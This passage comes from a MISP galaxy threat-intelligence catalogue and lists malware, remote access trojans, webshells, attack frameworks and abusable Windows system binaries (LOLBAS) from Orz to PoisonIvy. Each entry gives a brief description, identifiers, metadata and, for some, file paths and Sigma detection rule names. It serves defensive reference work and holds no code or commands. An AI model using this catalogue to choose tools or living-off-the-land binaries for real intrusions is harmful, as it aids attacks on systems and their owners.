UUID 5edec691-d2f1-4928-a12d-1ff59ba959a6 which can be used as unique global reference for OpenSSH in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5273 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Orz
Orz is a custom JavaScript backdoor used by Leviathan. It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. [Proofpoint Leviathan Oct 2017] [FireEye Periscope March 2018]
Internal MISP references
UUID 45a52a29-00c0-458a-b705-1040e06a43f2 which can be used as unique global reference for Orz in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0229 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
OSInfo
OSInfo is a custom tool used by APT3 to do internal discovery on a victim's computer and network. [Symantec Buckeye]
Internal MISP references
UUID fa1e13b8-2fb7-42e8-b630-25f0edfbca65 which can be used as unique global reference for OSInfo in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0165 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
OSX_OCEANLOTUS.D
OSX_OCEANLOTUS.D is a macOS backdoor used by APT32. First discovered in 2015, APT32 has continued to make improvements using a plugin architecture to extend capabilities, specifically using .dylib files. OSX_OCEANLOTUS.D can also determine it's permission level and execute according to access type (root or user).[Unit42 OceanLotus 2017][TrendMicro MacOS April 2018][Trend Micro MacOS Backdoor November 2020]
Internal MISP references
UUID a45904b5-0ada-4567-be4c-947146c7f574 which can be used as unique global reference for OSX_OCEANLOTUS.D in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0352 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
OSX/Shlayer
OSX/Shlayer is a Trojan designed to install adware on macOS that was first discovered in 2018.[Carbon Black Shlayer Feb 2019][Intego Shlayer Feb 2018]
Internal MISP references
UUID 4d91d625-21d8-484a-b63f-0a3daa4ed434 which can be used as unique global reference for OSX/Shlayer in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0402 |
| source | MITRE |
| type | ['malware'] |
Out1
Out1 is a remote access tool written in python and used by MuddyWater since at least 2021.[Trend Micro Muddy Water March 2021]
Internal MISP references
UUID 273b1e8d-a23d-4c22-8493-80f3d6639352 which can be used as unique global reference for Out1 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0594 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
OutSteel
OutSteel is a file uploader and document stealer developed with the scripting language AutoIT that has been used by Ember Bear since at least March 2021.[Palo Alto Unit 42 OutSteel SaintBot February 2022 ]
Internal MISP references
UUID 042fe42b-f60e-45e1-b47d-a913e0677976 which can be used as unique global reference for OutSteel in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1017 |
| source | MITRE |
| tags | ['8bf128ad-288b-41bc-904f-093f4fdde745', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
OwaAuth
OwaAuth is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by Threat Group-3390. [Dell TG-3390]
Internal MISP references
UUID 6d8a8510-e6f1-49a7-b3a5-bd4664937147 which can be used as unique global reference for OwaAuth in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0072 |
| source | MITRE |
| type | ['malware'] |
P2P ZeuS
P2P ZeuS is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture. [Dell P2P ZeuS]
Internal MISP references
UUID 916f8a7c-e487-4446-b6ee-c8da712a9569 which can be used as unique global reference for P2P ZeuS in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0016 |
| source | MITRE |
| type | ['malware'] |
P8RAT
P8RAT is a fileless malware used by menuPass to download and execute payloads since at least 2020.[Securelist APT10 March 2021]
Internal MISP references
UUID 1933ad3d-3085-4b1b-82b9-ac51b440e2bf which can be used as unique global reference for P8RAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0626 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pacu
Pacu is an open-source AWS exploitation framework. The tool is written in Python and publicly available on GitHub.[GitHub Pacu]
Internal MISP references
UUID e90eb529-1665-5fd7-a44e-695715e4081b which can be used as unique global reference for Pacu in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['IaaS'] |
| software_attack_id | S1091 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'e81ba503-60b0-4b64-8f20-ef93e7783796', 'a2e000da-8181-4327-bacd-32013dbd3654', '2e5f6e4a-4579-46f7-9997-6923180815dd', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Pandora
Pandora is a multistage kernel rootkit with backdoor functionality that has been in use by Threat Group-3390 since at least 2020.[Trend Micro Iron Tiger April 2021]
Internal MISP references
UUID 320b0784-4f0f-46ea-99e9-c34bfcca1c2e which can be used as unique global reference for Pandora in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0664 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pasam
Pasam is a trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Pasam May 2012]
Internal MISP references
UUID 3f018e73-d09b-4c8d-815b-8b2c8faf7055 which can be used as unique global reference for Pasam in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0208 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pass-The-Hash Toolkit
Pass-The-Hash Toolkit is a toolkit that allows an adversary to "pass" a password hash (without knowing the original password) to log in to systems. [Mandiant APT1]
Internal MISP references
UUID 8d007d52-8898-494c-8d72-354abd93da1e which can be used as unique global reference for Pass-The-Hash Toolkit in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0122 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
PasswordFox
PasswordFox is a tool used to recover passwords from Firefox web browser.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID e12e1de8-a0d9-4602-8264-5952106bd53c which can be used as unique global reference for PasswordFox in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5037 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
P.A.S. Webshell
P.A.S. Webshell is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.[ANSSI Sandworm January 2021]
Internal MISP references
UUID 4d79530c-2fd9-4438-a8da-74f42119695a which can be used as unique global reference for P.A.S. Webshell in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'Windows'] |
| software_attack_id | S0598 |
| source | MITRE |
| tags | ['311abf64-a9cc-4c6a-b778-32c5df5658be'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pay2Key
Pay2Key is a ransomware written in C++ that has been used by Fox Kitten since at least July 2020 including campaigns against Israeli companies. Pay2Key has been incorporated with a leak site to display stolen sensitive information to further pressure victims into payment.[ClearkSky Fox Kitten February 2020][Check Point Pay2Key November 2020]
Internal MISP references
UUID 9aa21e50-726e-4002-8b7b-75697a03eb2b which can be used as unique global reference for Pay2Key in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0556 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pcalua
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Program Compatibility Assistant
Author: Oddvar Moe
Paths: * C:\Windows\System32\pcalua.exe
Resources: * https://twitter.com/KyleHanslovan/status/912659279806640128
Detection: * Sigma: proc_creation_win_lolbin_pcalua.yml[Pcalua.exe - LOLBAS Project]
Internal MISP references
UUID 00daafc4-8bf1-4447-b24f-1580263124f5 which can be used as unique global reference for Pcalua in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5137 |
| source | Tidal Cyber |
| tags | ['074533ec-e14a-4dc3-98ae-c029904e3d6d', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
PCHunter
PCHunter is a tool used to enable advanced task management, including for system processes and kernels.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 591acc39-1218-4710-aadc-150ae6475ee3 which can be used as unique global reference for PCHunter in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5038 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
PcShare
PcShare is an open source remote access tool that has been modified and used by Chinese threat actors, most notably during the FunnyDream campaign since late 2018.[Bitdefender FunnyDream Campaign November 2020][GitHub PcShare 2014]
Internal MISP references
UUID 71eb2211-39aa-4b89-bd51-9dcabd363149 which can be used as unique global reference for PcShare in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1050 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['tool'] |
Pcwrun
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Program Compatibility Wizard
Author: Oddvar Moe
Paths: * C:\Windows\System32\pcwrun.exe
Resources: * https://twitter.com/pabraeken/status/991335019833708544 * https://twitter.com/nas_bench/status/1535663791362519040
Detection: * Sigma: proc_creation_win_lolbin_pcwrun_follina.yml[Pcwrun.exe - LOLBAS Project]
Internal MISP references
UUID 7babb537-ec29-425a-9108-43d1619e02b5 which can be used as unique global reference for Pcwrun in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5138 |
| source | Tidal Cyber |
| tags | ['62496b72-7820-4512-b3f9-188464bb8161', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Pcwutl
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft HTML Viewer
Author: LOLBAS Team
Paths: * c:\windows\system32\pcwutl.dll * c:\windows\syswow64\pcwutl.dll
Resources: * https://twitter.com/harr0ey/status/989617817849876488 * https://windows10dll.nirsoft.net/pcwutl_dll.html
Detection: * Analysis: https://redcanary.com/threat-detection-report/techniques/rundll32/ * Sigma: proc_creation_win_rundll32_susp_activity.yml[Pcwutl.dll - LOLBAS Project]
Internal MISP references
UUID 47ba2c2c-b4f3-48dc-878f-b8cab6d97f65 which can be used as unique global reference for Pcwutl in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5193 |
| source | Tidal Cyber |
| tags | ['ff5c357e-6b9b-4ef3-a7ed-e5d4c0091c0c', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Peirates
Peirates is a post-exploitation Kubernetes exploitation framework with a focus on gathering service account tokens for lateral movement and privilege escalation. The tool is written in GoLang and publicly available on GitHub.[Peirates GitHub]
Internal MISP references
UUID 52a19c73-2454-4893-8f84-8d05c37a9472 which can be used as unique global reference for Peirates in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Containers'] |
| software_attack_id | S0683 |
| source | MITRE |
| tags | ['2e5f6e4a-4579-46f7-9997-6923180815dd', '4fa6f8e1-b0d5-4169-8038-33e355c08bde', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Penquin
Penquin is a remote access trojan (RAT) with multiple versions used by Turla to target Linux systems since at least 2014.[Kaspersky Turla Penquin December 2014][Leonardo Turla Penquin May 2020]
Internal MISP references
UUID 951fad62-f636-4c01-b924-bb0ce87f5b20 which can be used as unique global reference for Penquin in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux'] |
| software_attack_id | S0587 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Peppy
Peppy is a Python-based remote access Trojan, active since at least 2012, with similarities to Crimson.[Proofpoint Operation Transparent Tribe March 2016]
Internal MISP references
UUID 1f080577-c002-4b49-a342-fa70983c1d58 which can be used as unique global reference for Peppy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0643 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pester
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used as part of the Powershell pester
Author: Oddvar Moe
Paths: * c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat * c:\Program Files\WindowsPowerShell\Modules\Pester*\bin\Pester.bat
Resources: * https://twitter.com/Oddvarmoe/status/993383596244258816 * https://twitter.com/st0pp3r/status/1560072680887525378 * https://twitter.com/st0pp3r/status/1560072680887525378
Detection: * Sigma: proc_creation_win_lolbin_pester_1.yml[Pester.bat - LOLBAS Project]
Internal MISP references
UUID 5028ed72-8e6b-48bd-b4f4-e42df926893d which can be used as unique global reference for Pester in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5264 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Phobos Ransomware
This object represents a collection of MITRE ATT&CK® Techniques associated with Phobos ransomware binaries, as highlighted in sources such as joint Cybersecurity Advisory AA24-060A.[U.S. CISA Phobos February 29 2024]
Internal MISP references
UUID d7015696-0aa1-4c13-a0e6-b9d8e027dabf which can be used as unique global reference for Phobos Ransomware in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5279 |
| source | Tidal Cyber |
| tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
PHOREAL
PHOREAL is a signature backdoor used by APT32. [FireEye APT32 May 2017]
Internal MISP references
UUID fd63cec1-9f72-4ed0-9926-2dbbb3d9cead which can be used as unique global reference for PHOREAL in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0158 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pikabot
Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the Add to Matrix button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a 60-second tutorial here).
Pikabot is a malware first observed in early 2023 that has downloader/dropper and backdoor functionality. Researchers observed Pikabot distribution increase following the disruption of the QakBot botnet by authorities in August 2023. Originally distributed via spam email campaigns, researchers observed the threat actor TA577 (previously known for distributing payloads including QakBot, IcedID, SystemBC, and Cobalt Strike) distributing Pikabot starting in December 2023.[Malwarebytes Pikabot December 15 2023]
Internal MISP references
UUID d2a226a2-ffa1-4bb0-a090-96dc42f9c84c which can be used as unique global reference for Pikabot in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5265 |
| source | Tidal Cyber |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pillowmint
Pillowmint is a point-of-sale malware used by FIN7 designed to capture credit card information.[Trustwave Pillowmint June 2020]
Internal MISP references
UUID db5d718b-1344-4aa2-8e6a-54e68d8adfb1 which can be used as unique global reference for Pillowmint in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0517 |
| source | MITRE |
| tags | ['6c6c0125-9631-4c2c-90ab-cfef374d5198'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
PinchDuke
PinchDuke is malware that was used by APT29 from 2008 to 2010. [F-Secure The Dukes]
Internal MISP references
UUID ba2208c8-5e1e-46cd-bef1-ffa7a2be3be4 which can be used as unique global reference for PinchDuke in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0048 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ping
Ping is an operating system utility commonly used to troubleshoot and verify network connections. [TechNet Ping]
Internal MISP references
UUID 4ea12106-c0a1-4546-bb64-a1675d9f5dc7 which can be used as unique global reference for Ping in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0097 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
PingCastle
PingCastle is a tool that can be used to enumerate Active Directory and map trust relationships. BianLian Ransomware Group actors have used the tool for discovery purposes during attacks.[U.S. CISA BianLian Ransomware May 2023]
Internal MISP references
UUID 1debf242-3c91-4bdb-932c-27d61fe17474 which can be used as unique global reference for PingCastle in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5003 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
PingPull
PingPull is a remote access Trojan (RAT) written in Visual C++ that has been used by GALLIUM since at least June 2022. PingPull has been used to target telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.[Unit 42 PingPull Jun 2022]
Internal MISP references
UUID 4360cc62-7263-48b2-bd2a-a7737563545c which can be used as unique global reference for PingPull in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1031 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
PipeMon
PipeMon is a multi-stage modular backdoor used by Winnti Group.[ESET PipeMon May 2020]
Internal MISP references
UUID 92744f7b-9f1a-472c-bae0-2d4a7ce68bb4 which can be used as unique global reference for PipeMon in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0501 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pisloader
Pisloader is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by APT18 and is similar to another malware family, HTTPBrowser, that has been used by the group. [Palo Alto DNS Requests]
Internal MISP references
UUID 14e65c5d-5164-41a3-92de-67fdd1d529d2 which can be used as unique global reference for Pisloader in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0124 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pktmon
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
Author: Derek Johnson
Paths: * c:\windows\system32\pktmon.exe * c:\windows\syswow64\pktmon.exe
Resources: * https://binar-x79.com/windows-10-secret-sniffer/
Detection: * Sigma: proc_creation_win_lolbin_pktmon.yml * IOC: .etl files found on system[Pktmon.exe - LOLBAS Project]
Internal MISP references
UUID 0b0ae21a-987c-44c5-93db-3b228544eb99 which can be used as unique global reference for Pktmon in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5139 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
PLAINTEE
PLAINTEE is a malware sample that has been used by Rancor in targeted attacks in Singapore and Cambodia. [Rancor Unit42 June 2018]
Internal MISP references
UUID 9445f18a-a796-447a-a35f-94a9fb72411c which can be used as unique global reference for PLAINTEE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0254 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
PLEAD
PLEAD is a remote access tool (RAT) and downloader used by BlackTech in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.[TrendMicro BlackTech June 2017][JPCert PLEAD Downloader June 2018] PLEAD has also been referred to as TSCookie, though more recent reporting indicates likely separation between the two. PLEAD was observed in use as early as March 2017.[JPCert TSCookie March 2018][JPCert PLEAD Downloader June 2018]
Internal MISP references
UUID 9a890a85-afbe-4c35-a3e7-1adad481bdf7 which can be used as unique global reference for PLEAD in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0435 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Plink
Plink is a tool used to automate Secure Shell (SSH) actions on Windows.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 6117e2b5-140b-49d2-89b7-76d91e6c798c which can be used as unique global reference for Plink in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5041 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'a1427c89-2ebd-440f-b7e0-9728e3ef2096', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
PlugX
PlugX is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.[Lastline PlugX Analysis][FireEye Clandestine Fox Part 2][New DragonOK][Dell TG-3390]
Internal MISP references
UUID 070b56f4-7810-4dad-b85f-bdfce9c08c10 which can be used as unique global reference for PlugX in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0013 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
pngdowner
pngdowner is malware used by Putter Panda. It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple "download-and- execute" utility. [CrowdStrike Putter Panda]
Internal MISP references
UUID 95c273d2-3081-4cb5-8d41-37eb4e90264d which can be used as unique global reference for pngdowner in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0067 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pnputil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used for installing drivers
Author: Hai vaknin (lux)
Paths: * C:\Windows\system32\pnputil.exe
Resources: None Provided
Detection: * Sigma: proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml[Pnputil.exe - LOLBAS Project]
Internal MISP references
UUID dd1e8b57-4900-4823-b194-1526c1e00099 which can be used as unique global reference for Pnputil in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5140 |
| source | Tidal Cyber |
| tags | ['6d924d43-5de3-45de-8466-a8c47a5b9e68', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
PoetRAT
PoetRAT is a remote access trojan (RAT) that was first identified in April 2020. PoetRAT has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. PoetRAT derived its name from references in the code to poet William Shakespeare. [Talos PoetRAT April 2020][Talos PoetRAT October 2020][Dragos Threat Report 2020]
Internal MISP references
UUID 79b4f277-3b18-4aa7-9f96-44b35b23166b which can be used as unique global reference for PoetRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0428 |
| source | MITRE |
| type | ['malware'] |
PoisonIvy
PoisonIvy is a popular remote access tool (RAT) that has been used by many groups.[FireEye Poison Ivy][Symantec Elderwood Sept 2012][Symantec Darkmoon Aug 2005]
Internal MISP references
UUID 1d87a695-7989-49ae-ac1a-b6601db565c3 which can be used as unique global reference for PoisonIvy in MISP communities and other software using the MISP galaxy
